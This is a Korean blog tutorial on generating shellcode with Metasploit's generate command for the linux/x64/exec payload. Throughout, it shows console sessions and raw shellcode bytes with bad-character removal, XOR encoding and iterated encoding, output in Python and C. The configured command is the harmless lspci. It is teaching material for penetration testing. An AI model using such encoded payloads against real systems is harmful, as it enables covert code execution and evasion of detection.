[METASPLOIT] Metasploit에서 generate 명령을 통해 payload 생성하기(generate shellcode on metasploit)

by hahwul 2 min read

msf에서는 공격에 사용되는 shell을 code 형태로 나타낼 수 있는 기능이 있습니다. 바로 generate 명령입니다. 이 명령을 통해 shellcode를 육안으로 보고 복사하여 사용할 수 있게 하는 좋은 기능입니다.

payload 지정 후 generate 명령으로 shellcode 출력

hahwul #> use payload/linux/x64/exec hahwul payload(exec) #> hahwul payload(exec) #> hahwul payload(exec) #> show options

Module options (payload/linux/x64/exec):

Name Current Setting Required Description —- ————— ——– ———– CMD yes The command string to execute

generate 옵션 확인 hahwul payload(exec) #> generate -h Usage: generate [options]

Generates a payload.

OPTIONS:

-E        Force encoding.
-b <opt>  The list of characters to avoid: '\x00\xff'
-e <opt>  The name of the encoder module to use.
-f <opt>  The output file name (otherwise stdout)
-h        Help banner.
-i <opt>  the number of encoding iterations.
-k        Keep the template executable functional
-o <opt>  A comma separated list of options in VAR=VAL format.
-p <opt>  The Platform for output.
-s <opt>  NOP sled length.
-t <opt>  The output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,psh-cmd,vba,vba-exe,vba-psh,vbs,war
-x <opt>  The executable template to use

CMD를 lspci로 설정 후 generate 명령을 통해 shell code 확인하기 hahwul payload(exec) #> set CMD lspci CMD => lspci hahwul payload(exec) #> generate

linux/x64/exec - 45 bytes

http://www.metasploit.com

VERBOSE=false, PrependFork=false, PrependSetresuid=false,

PrependSetreuid=false, PrependSetuid=false,

PrependSetresgid=false, PrependSetregid=false,

PrependSetgid=false, PrependChrootBreak=false,

AppendExit=false, CMD=lspci

buf = “\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00” + “\x53\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8” + “\x06\x00\x00\x00\x6c\x73\x70\x63\x69\x00\x56\x57\x48\x89” + “\xe6\x0f\x05” hahwul payload(exec) #>

옵션을 활용한 정교한 shellcode generate

-b 옵션을 통해 제거해야할 데이터가 있다면 제거합니다. 예시로는 \x00 을 제거하면 아래와 같이 \x00이 제거된 코드로 나타나게됩니다.

hahwul payload(exec) #>generate -b ‘\x00’

linux/x64/exec - 87 bytes

http://www.metasploit.com

Encoder: x64/xor

VERBOSE=false, PrependFork=false, PrependSetresuid=false,

PrependSetreuid=false, PrependSetuid=false,

PrependSetresgid=false, PrependSetregid=false,

PrependSetgid=false, PrependChrootBreak=false,

AppendExit=false, CMD=lspci

buf = “\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef” + “\xff\xff\xff\x48\xbb\xc2\x4b\xf7\xf3\x14\x43\x3d\x2c\x48” + “\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xa8\x70\xaf” + “\x6a\x5c\xf8\x12\x4e\xab\x25\xd8\x80\x7c\x43\x6e\x64\x4b” + “\xac\x9f\xde\x77\x43\x3d\x64\x4b\xad\xa5\x1b\x12\x43\x3d” + “\x2c\xae\x38\x87\x90\x7d\x43\x6b\x7b\x8a\xc2\x11\xfc\x11” + “\x43\x3d\x2c” hahwul payload(exec) #>

-e 옵션을 통해서는 encoder를 지정할 수 있습니다. x86/shikata_ga_nai 가 좋지만, 위 설정에서 64비트 기준으로 하였기에 간단한 xor encoder를 이용하겠습니다.

hahwul payload(exec) #> generate -e x64/xor

linux/x64/exec - 87 bytes

http://www.metasploit.com

Encoder: x64/xor

VERBOSE=false, PrependFork=false, PrependSetresuid=false,

PrependSetreuid=false, PrependSetuid=false,

PrependSetresgid=false, PrependSetregid=false,

PrependSetgid=false, PrependChrootBreak=false,

AppendExit=false, CMD=lspci

buf = “\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef” + “\xff\xff\xff\x48\xbb\x94\x05\xbe\x56\x5a\x0d\x93\xa2\x48” + “\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xfe\x3e\xe6” + “\xcf\x12\xb6\xbc\xc0\xfd\x6b\x91\x25\x32\x0d\xc0\xea\x1d” + “\xe2\xd6\x7b\x39\x0d\x93\xea\x1d\xe3\xec\xbe\x5c\x0d\x93” + “\xa2\xf8\x76\xce\x35\x33\x0d\xc5\xf5\xdc\x8c\x58\x59\x5f” + “\x0d\x93\xa2” hahwul payload(exec) #>

-f 옵션을 통해서 데이터로 쓸 수도 있구요. hahwul payload(exec) #>generate -b ‘\x00’ -e x64/xor -f ./test.shell [*] Writing 701 bytes to ./test.shell… hahwul payload(exec) #>

-i 옵션을 통해서 여러번 처리할 수 있습니다.

hahwul payload(exec) #> generate -b ‘\x00’ -i 4

linux/x64/exec - 207 bytes

http://www.metasploit.com

Encoder: x64/xor

VERBOSE=false, PrependFork=false, PrependSetresuid=false,

PrependSetreuid=false, PrependSetuid=false,

PrependSetresgid=false, PrependSetregid=false,

PrependSetgid=false, PrependChrootBreak=false,

AppendExit=false, CMD=lspci

buf = “\x48\x31\xc9\x48\x81\xe9\xeb\xff\xff\xff\x48\x8d\x05\xef” + “\xff\xff\xff\x48\xbb\xfe\x1e\x65\x70\xde\x25\xc7\x50\x48” + “\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xb6\x2f\xac” + “\x38\x5f\xcc\x37\xaf\x01\xe1\x2d\xfd\xdb\xca\x38\xaf\x01” + “\x56\xde\xb2\x2f\xd9\xb1\xb8\x0a\xef\xec\x38\xef\x7d\xe0” + “\x18\xd3\xe6\x9a\x8f\x21\xc7\x33\xda\x3e\x2b\x5b\x19\xc3” + “\x21\xb1\x6d\xf0\xaa\x9e\x9d\xc5\x2b\xb1\x6d\x47\x59\x3b” + “\x2c\x66\x87\xab\xda\x69\xe9\x5b\xa9\x72\xf3\x06\xbf\xf7” + “\x1d\xec\x67\xc8\x20\x2e\x17\x8a\xf9\x77\x39\xb6\x20\x99” + “\xd9\x0b\x3c\xf3\x3f\xb3\x20\x99\x6e\xf8\x23\xc4\x49\xae” + “\x3d\xe8\x40\x3f\xf9\xc7\x88\x6b\x97\x4b\xde\xbc\x4e\x09” + “\x32\xb8\x27\x6f\xe7\x38\x1b\xc3\x99\x52\x24\x3a\x90\xd2” + “\x3b\x78\xe5\x78\xc4\xb3\xd7\x8c\x30\x78\xb6\x78\xc4\xb2” + “\xed\x49\x55\x78\xb6\x30\x21\x27\xcf\xc2\x3a\x78\xe0\x67” + “\x05\xdd\x59\xae\x56\x78\xb6\x30\xdf\x4e\x50”

msfpayload 는 여러 옵션을 포맷을 지원하기에 -t 옵션으로 type 을 지정할 수 있습니다. hahwul payload(exec) #> generate -b ‘\x00’ -t python

linux/x64/exec - 87 bytes

http://www.metasploit.com

Encoder: x64/xor

VERBOSE=false, PrependFork=false, PrependSetresuid=false,

PrependSetreuid=false, PrependSetuid=false,

PrependSetresgid=false, PrependSetregid=false,

PrependSetgid=false, PrependChrootBreak=false,

AppendExit=false, CMD=lspci

buf = “” buf += “\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05” buf += “\xef\xff\xff\xff\x48\xbb\xc1\x50\xbb\x1a\xa4\x7c\xa3” buf += “\xab\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4” buf += “\xab\x6b\xe3\x83\xec\xc7\x8c\xc9\xa8\x3e\x94\x69\xcc” buf += “\x7c\xf0\xe3\x48\xb7\xd3\x37\xc7\x7c\xa3\xe3\x48\xb6” buf += “\xe9\xf2\xa2\x7c\xa3\xab\xad\x23\xcb\x79\xcd\x7c\xf5” buf += “\xfc\x89\xd9\x5d\x15\xa1\x7c\xa3\xab” hahwul payload(exec) #> generate -b ‘\x00’ -t c /*

  • linux/x64/exec - 87 bytes
  • http://www.metasploit.com
  • Encoder: x64/xor
  • VERBOSE=false, PrependFork=false, PrependSetresuid=false,
  • PrependSetreuid=false, PrependSetuid=false,
  • PrependSetresgid=false, PrependSetregid=false,
  • PrependSetgid=false, PrependChrootBreak=false,
  • AppendExit=false, CMD=lspci */ unsigned char buf[] = “\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef\xff” “\xff\xff\x48\xbb\x9f\x84\x06\xdd\x08\xb0\xb7\x8d\x48\x31\x58” “\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xf5\xbf\x5e\x44\x40\x0b” “\x98\xef\xf6\xea\x29\xae\x60\xb0\xe4\xc5\x16\x63\x6e\xf0\x6b” “\xb0\xb7\xc5\x16\x62\x54\x35\x0e\xb0\xb7\x8d\xf3\xf7\x76\xbe” “\x61\xb0\xe1\xda\xd7\x0d\xe0\xd2\x0d\xb0\xb7\x8d”; hahwul payload(exec) #>